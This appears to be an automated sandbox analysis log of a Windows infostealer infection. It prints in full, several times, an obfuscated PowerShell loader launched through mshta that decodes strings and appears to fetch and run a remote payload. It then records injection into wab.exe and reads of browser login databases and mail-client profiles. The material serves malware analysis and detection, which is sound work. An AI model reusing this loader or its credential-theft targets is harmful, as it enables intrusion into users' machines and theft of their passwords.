WortaSagebpRkee,pLandsdPersoaEnhedt Nonda M.do% Begy\FoldnP emio PrisnInturoLskedsCo lb.BannuLNonlosSpangiDimme Dra,e&Unlik& Appe ModereTutt.c Sh,khUdenloGangs Dext$St re ';bifilar (Skftendes 'Mexic$ReclugRumerl bogho A.stbEpiotaRverhlSentr:Trup.B ilcratebrelDyarclCrypto ersinSclereMonit=Dogli(,argicColasmfactodSmak, phono/AnnsocBugsp Ox da$Hypa LPo.duuPaea m KaloiTypolnRevera AntirMineri MisasTalemmHjlpe)krges ');bifilar (Skftendes 'z.nev$FictigUtrosl R,oto Sp.gbP,etea Salpl Lyst:MarshzGri.ao JvnsoPyj msForurpDatamo.vnfrrAmbroi ApplfCateceHemoerIn enophotou.remasTeake= ldef$DialuESammenUndive Pi,sbChallrChemorMidd.e SpidtOutdrsAffix. Fr ssSvarspR,stal.emimiDe.artIagtt(Brier$cl glFBuslioBioryl AccuiPlagio SublsCorpseAnago)Lystb ');$Enebrrets=$zoosporiferous[0];bifilar (Skftendes ' Jyde$F stfg.eltslSygemo sympb Sk iaKontalKance:GejstP Des,oTilnalU.actkIndstaA,lnneAutoprTgt.nn.rakbeEpicasUddan= SandN,ejseeMach,wNonsy-K.ybbOU,skibRaastjsysteeVi.kecKo,rit Horn epichSEanliy.orsis SknhtMidtpeFoelgm Soom.TeletNPhlebe Mi,itImman.BlrebWEr theMetrobLagerCRei,olUncomi UdkieB.ndenPlaygtFilmk ');bifilar (Skftendes 'Stoma$VendiPMistro RapulEnchrk Tidsa .imreFash rUrinonfledfe entrsPhore. Kend			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ponos.Lsi && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$ungelatinizables = 1;$fostrene='substrin';$fostrene+='g';function skftendes($kriminologien){$svanehamme54=$kriminologien.length-$ungelatinizables;for($ruslandsrejsernes=5; $ruslandsrejsernes -lt $svanehamme54; $ruslandsrejsernes+=(6)){$forbudsbestemmelserne+=$kriminologien.$fostrene.invoke($ruslandsrejsernes, $ungelatinizables);}$forbudsbestemmelserne;}function bifilar($unkneaded){. ($aaretags) ($unkneaded);}$capitalizable=skftendes 'potlimtr,ceochirozaflb,i .prrltraadlsexboaunde,/sk,lp5killi.terri0 rger kolb (,picuwildr ihelmen ratidbegy.ogratiwmothes quiv pos.vnf,eretprepo rbe1angle0b rre.tandl0tog m; ,ham filthwunconiko,pen disc6smakk4 a yn;lager dara,xma.nm6v.rsh4canva;grave blunrudovevkry.r:grema1gigas2hals 1foxes.roddi0h gei)sikat tailsgunholedespec rattk bonnoetuie/udgy 2bauck0k.ast1i,kol0 pr,z0termo1medle0 nlea1 bles fratrf un.gislaskr s afe tilmfunculo ude,xtoxop/ sptt1idrif2.ftgt1 ep t. g sg0 pert ';$ergometercykelen=skftendes 'fors ucystossamtie olkrs,ovl-stinkafo,urg le.eeint,rnbakketchlor ';$enebrrets=skftendes 'instihsensitstrantunexepstrubs inte:p,yto/ansva/ noncd sem.r,ettoistyrivlbehjeu.byt.pole g brisor.dioo ndergdrosol prizeindex.transchusbuo roglm b.ob/svvefuten.ncprogn?had ne,iunixantidpenga,omoater softtfreds=phytodinf,robiogrwk.ejnnsand l eft o teleagastrdoldsa&pi.niiresoudg and= ight1 ur.naquerifcoactw sept_cyprabtromsukun,tr vi dnstok.xfr.it9epipitover.f oncoopo.yg3 antiostrygopsyc,2invensribbor intexjivinjdeforldobb.cse.mln thinks rti9 .arru mer.x udgahgld.tasynontsvin,bspec. ';$foliose=skftendes 'lydis>upbr. ';$aaretags=skftendes 'kn gliflereeneutrx azim ';$luminarism = skftendes 'pinnieferiec de.thfl efobagga vaad% wortasagebprkee,plandsdpersoaenhedt nonda m.do% begy\foldnp emio prisninturolskedsco lb.bannulnonlosspangidimme dra,e&unlik& appe moderetutt.c sh,khudenlogangs dext$st re ';bifilar (skftendes 'mexic$reclugrumerl bogho a.stbepiotarverhlsentr:trup.b ilcratebreldyarclcrypto ersinscleremonit=dogli(,argiccolasmfactodsmak, phono/annsocbugsp ox da$hypa lpo.duupaea m kaloitypolnrevera antirmineri misastalemmhjlpe)krges ');bifilar (skftendes 'z.nev$fictigutrosl r,oto sp.gbp,etea salpl lyst:marshzgri.ao jvnsopyj msforurpdatamo.vnfrrambroi applfcatecehemoerin enophotou.remasteake= ldef$dialuesammenundive pi,sbchallrchemormidd.e spidtoutdrsaffix. fr sssvarspr,stal.emimide.artiagtt(brier$cl glfbusliobioryl accuiplagio sublscorpseanago)lystb ');$enebrrets=$zoosporiferous[0];bifilar (skftendes ' jyde$f stfg.eltslsygemo sympb sk iakontalkance:gejstp des,otilnalu.actkindstaa,lnneautoprtgt.nn.rakbeepicasuddan= sandn,ejseemach,wnonsy-k.ybbou,skibraastjsysteevi.kecko,rit horn epichseanliy.orsis sknhtmidtpefoelgm soom.teletnphlebe mi,itimman.blrebwer themetroblagercrei,oluncomi udkieb.ndenplaygtfilmk ');bifilar (skftendes 'stoma$vendipmistro rapulenchrk tidsa .imrefash rurinonfledfe entrsphore. kend
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$ungelatinizables = 1;$fostrene='substrin';$fostrene+='g';function skftendes($kriminologien){$svanehamme54=$kriminologien.length-$ungelatinizables;for($ruslandsrejsernes=5; $ruslandsrejsernes -lt $svanehamme54; $ruslandsrejsernes+=(6)){$forbudsbestemmelserne+=$kriminologien.$fostrene.invoke($ruslandsrejsernes, $ungelatinizables);}$forbudsbestemmelserne;}function bifilar($unkneaded){. ($aaretags) ($unkneaded);}$capitalizable=skftendes 'potlimtr,ceochirozaflb,i .prrltraadlsexboaunde,/sk,lp5killi.terri0 rger kolb (,picuwildr ihelmen ratidbegy.ogratiwmothes quiv pos.vnf,eretprepo rbe1angle0b rre.tandl0tog m; ,ham filthwunconiko,pen disc6smakk4 a yn;lager dara,xma.nm6v.rsh4canva;grave blunrudovevkry.r:grema1gigas2hals 1foxes.roddi0h gei)sikat tailsgunholedespec rattk bonnoetuie/udgy 2bauck0k.ast1i,kol0 pr,z0termo1medle0 nlea1 bles fratrf un.gislaskr s afe tilmfunculo ude,xtoxop/ sptt1idrif2.ftgt1 ep t. g sg0 pert ';$ergometercykelen=skftendes 'fors ucystossamtie olkrs,ovl-stinkafo,urg le.eeint,rnbakketchlor ';$enebrrets=skftendes 'instihsensitstrantunexepstrubs inte:p,yto/ansva/ noncd sem.r,ettoistyrivlbehjeu.byt.pole g brisor.dioo ndergdrosol prizeindex.transchusbuo roglm b.ob/svvefuten.ncprogn?had ne,iunixantidpenga,omoater softtfreds=phytodinf,robiogrwk.ejnnsand l eft o teleagastrdoldsa&pi.niiresoudg and= ight1 ur.naquerifcoactw sept_cyprabtromsukun,tr vi dnstok.xfr.it9epipitover.f oncoopo.yg3 antiostrygopsyc,2invensribbor intexjivinjdeforldobb.cse.mln thinks rti9 .arru mer.x udgahgld.tasynontsvin,bspec. ';$foliose=skftendes 'lydis>upbr. ';$aaretags=skftendes 'kn gliflereeneutrx azim ';$luminarism = skftendes 'pinnieferiec de.thfl efobagga vaad% wortasagebprkee,plandsdpersoaenhedt nonda m.do% begy\foldnp emio prisninturolskedsco lb.bannulnonlosspangidimme dra,e&unlik& appe moderetutt.c sh,khudenlogangs dext$st re ';bifilar (skftendes 'mexic$reclugrumerl bogho a.stbepiotarverhlsentr:trup.b ilcratebreldyarclcrypto ersinscleremonit=dogli(,argiccolasmfactodsmak, phono/annsocbugsp ox da$hypa lpo.duupaea m kaloitypolnrevera antirmineri misastalemmhjlpe)krges ');bifilar (skftendes 'z.nev$fictigutrosl r,oto sp.gbp,etea salpl lyst:marshzgri.ao jvnsopyj msforurpdatamo.vnfrrambroi applfcatecehemoerin enophotou.remasteake= ldef$dialuesammenundive pi,sbchallrchemormidd.e spidtoutdrsaffix. fr sssvarspr,stal.emimide.artiagtt(brier$cl glfbusliobioryl accuiplagio sublscorpseanago)lystb ');$enebrrets=$zoosporiferous[0];bifilar (skftendes ' jyde$f stfg.eltslsygemo sympb sk iakontalkance:gejstp des,otilnalu.actkindstaa,lnneautoprtgt.nn.rakbeepicasuddan= sandn,ejseemach,wnonsy-k.ybbou,skibraastjsysteevi.kecko,rit horn epichseanliy.orsis sknhtmidtpefoelgm soom.teletnphlebe mi,itimman.blrebwer themetroblagercrei,oluncomi udkieb.ndenplaygtfilmk ');bifilar (skftendes 'stoma$vendipmistro rapulenchrk tidsa .imrefash rurinonfledfe entrsphore. kend
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$ungelatinizables = 1;$fostrene='substrin';$fostrene+='g';function skftendes($kriminologien){$svanehamme54=$kriminologien.length-$ungelatinizables;for($ruslandsrejsernes=5; $ruslandsrejsernes -lt $svanehamme54; $ruslandsrejsernes+=(6)){$forbudsbestemmelserne+=$kriminologien.$fostrene.invoke($ruslandsrejsernes, $ungelatinizables);}$forbudsbestemmelserne;}function bifilar($unkneaded){. ($aaretags) ($unkneaded);}$capitalizable=skftendes 'potlimtr,ceochirozaflb,i .prrltraadlsexboaunde,/sk,lp5killi.terri0 rger kolb (,picuwildr ihelmen ratidbegy.ogratiwmothes quiv pos.vnf,eretprepo rbe1angle0b rre.tandl0tog m; ,ham filthwunconiko,pen disc6smakk4 a yn;lager dara,xma.nm6v.rsh4canva;grave blunrudovevkry.r:grema1gigas2hals 1foxes.roddi0h gei)sikat tailsgunholedespec rattk bonnoetuie/udgy 2bauck0k.ast1i,kol0 pr,z0termo1medle0 nlea1 bles fratrf un.gislaskr s afe tilmfunculo ude,xtoxop/ sptt1idrif2.ftgt1 ep t. g sg0 pert ';$ergometercykelen=skftendes 'fors ucystossamtie olkrs,ovl-stinkafo,urg le.eeint,rnbakketchlor ';$enebrrets=skftendes 'instihsensitstrantunexepstrubs inte:p,yto/ansva/ noncd sem.r,ettoistyrivlbehjeu.byt.pole g brisor.dioo ndergdrosol prizeindex.transchusbuo roglm b.ob/svvefuten.ncprogn?had ne,iunixantidpenga,omoater softtfreds=phytodinf,robiogrwk.ejnnsand l eft o teleagastrdoldsa&pi.niiresoudg and= ight1 ur.naquerifcoactw sept_cyprabtromsukun,tr vi dnstok.xfr.it9epipitover.f oncoopo.yg3 antiostrygopsyc,2invensribbor intexjivinjdeforldobb.cse.mln thinks rti9 .arru mer.x udgahgld.tasynontsvin,bspec. ';$foliose=skftendes 'lydis>upbr. ';$aaretags=skftendes 'kn gliflereeneutrx azim ';$luminarism = skftendes 'pinnieferiec de.thfl efobagga vaad% wortasagebprkee,plandsdpersoaenhedt nonda m.do% begy\foldnp emio prisninturolskedsco lb.bannulnonlosspangidimme dra,e&unlik& appe moderetutt.c sh,khudenlogangs dext$st re ';bifilar (skftendes 'mexic$reclugrumerl bogho a.stbepiotarverhlsentr:trup.b ilcratebreldyarclcrypto ersinscleremonit=dogli(,argiccolasmfactodsmak, phono/annsocbugsp ox da$hypa lpo.duupaea m kaloitypolnrevera antirmineri misastalemmhjlpe)krges ');bifilar (skftendes 'z.nev$fictigutrosl r,oto sp.gbp,etea salpl lyst:marshzgri.ao jvnsopyj msforurpdatamo.vnfrrambroi applfcatecehemoerin enophotou.remasteake= ldef$dialuesammenundive pi,sbchallrchemormidd.e spidtoutdrsaffix. fr sssvarspr,stal.emimide.artiagtt(brier$cl glfbusliobioryl accuiplagio sublscorpseanago)lystb ');$enebrrets=$zoosporiferous[0];bifilar (skftendes ' jyde$f stfg.eltslsygemo sympb sk iakontalkance:gejstp des,otilnalu.actkindstaa,lnneautoprtgt.nn.rakbeepicasuddan= sandn,ejseemach,wnonsy-k.ybbou,skibraastjsysteevi.kecko,rit horn epichseanliy.orsis sknhtmidtpefoelgm soom.teletnphlebe mi,itimman.blrebwer themetroblagercrei,oluncomi udkieb.ndenplaygtfilmk ');bifilar (skftendes 'stoma$vendipmistro rapulenchrk tidsa .imrefash rurinonfledfe entrsphore. kend			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$ungelatinizables = 1;$fostrene='substrin';$fostrene+='g';function skftendes($kriminologien){$svanehamme54=$kriminologien.length-$ungelatinizables;for($ruslandsrejsernes=5; $ruslandsrejsernes -lt $svanehamme54; $ruslandsrejsernes+=(6)){$forbudsbestemmelserne+=$kriminologien.$fostrene.invoke($ruslandsrejsernes, $ungelatinizables);}$forbudsbestemmelserne;}function bifilar($unkneaded){. ($aaretags) ($unkneaded);}$capitalizable=skftendes 'potlimtr,ceochirozaflb,i .prrltraadlsexboaunde,/sk,lp5killi.terri0 rger kolb (,picuwildr ihelmen ratidbegy.ogratiwmothes quiv pos.vnf,eretprepo rbe1angle0b rre.tandl0tog m; ,ham filthwunconiko,pen disc6smakk4 a yn;lager dara,xma.nm6v.rsh4canva;grave blunrudovevkry.r:grema1gigas2hals 1foxes.roddi0h gei)sikat tailsgunholedespec rattk bonnoetuie/udgy 2bauck0k.ast1i,kol0 pr,z0termo1medle0 nlea1 bles fratrf un.gislaskr s afe tilmfunculo ude,xtoxop/ sptt1idrif2.ftgt1 ep t. g sg0 pert ';$ergometercykelen=skftendes 'fors ucystossamtie olkrs,ovl-stinkafo,urg le.eeint,rnbakketchlor ';$enebrrets=skftendes 'instihsensitstrantunexepstrubs inte:p,yto/ansva/ noncd sem.r,ettoistyrivlbehjeu.byt.pole g brisor.dioo ndergdrosol prizeindex.transchusbuo roglm b.ob/svvefuten.ncprogn?had ne,iunixantidpenga,omoater softtfreds=phytodinf,robiogrwk.ejnnsand l eft o teleagastrdoldsa&pi.niiresoudg and= ight1 ur.naquerifcoactw sept_cyprabtromsukun,tr vi dnstok.xfr.it9epipitover.f oncoopo.yg3 antiostrygopsyc,2invensribbor intexjivinjdeforldobb.cse.mln thinks rti9 .arru mer.x udgahgld.tasynontsvin,bspec. ';$foliose=skftendes 'lydis>upbr. ';$aaretags=skftendes 'kn gliflereeneutrx azim ';$luminarism = skftendes 'pinnieferiec de.thfl efobagga vaad% wortasagebprkee,plandsdpersoaenhedt nonda m.do% begy\foldnp emio prisninturolskedsco lb.bannulnonlosspangidimme dra,e&unlik& appe moderetutt.c sh,khudenlogangs dext$st re ';bifilar (skftendes 'mexic$reclugrumerl bogho a.stbepiotarverhlsentr:trup.b ilcratebreldyarclcrypto ersinscleremonit=dogli(,argiccolasmfactodsmak, phono/annsocbugsp ox da$hypa lpo.duupaea m kaloitypolnrevera antirmineri misastalemmhjlpe)krges ');bifilar (skftendes 'z.nev$fictigutrosl r,oto sp.gbp,etea salpl lyst:marshzgri.ao jvnsopyj msforurpdatamo.vnfrrambroi applfcatecehemoerin enophotou.remasteake= ldef$dialuesammenundive pi,sbchallrchemormidd.e spidtoutdrsaffix. fr sssvarspr,stal.emimide.artiagtt(brier$cl glfbusliobioryl accuiplagio sublscorpseanago)lystb ');$enebrrets=$zoosporiferous[0];bifilar (skftendes ' jyde$f stfg.eltslsygemo sympb sk iakontalkance:gejstp des,otilnalu.actkindstaa,lnneautoprtgt.nn.rakbeepicasuddan= sandn,ejseemach,wnonsy-k.ybbou,skibraastjsysteevi.kecko,rit horn epichseanliy.orsis sknhtmidtpefoelgm soom.teletnphlebe mi,itimman.blrebwer themetroblagercrei,oluncomi udkieb.ndenplaygtfilmk ');bifilar (skftendes 'stoma$vendipmistro rapulenchrk tidsa .imrefash rurinonfledfe entrsphore. kend			Jump to behavior

Language, Device and Operating System Detection

Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior

Source: Yara match

File source: 00000011.00000002.2432985015.0000000024B25000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY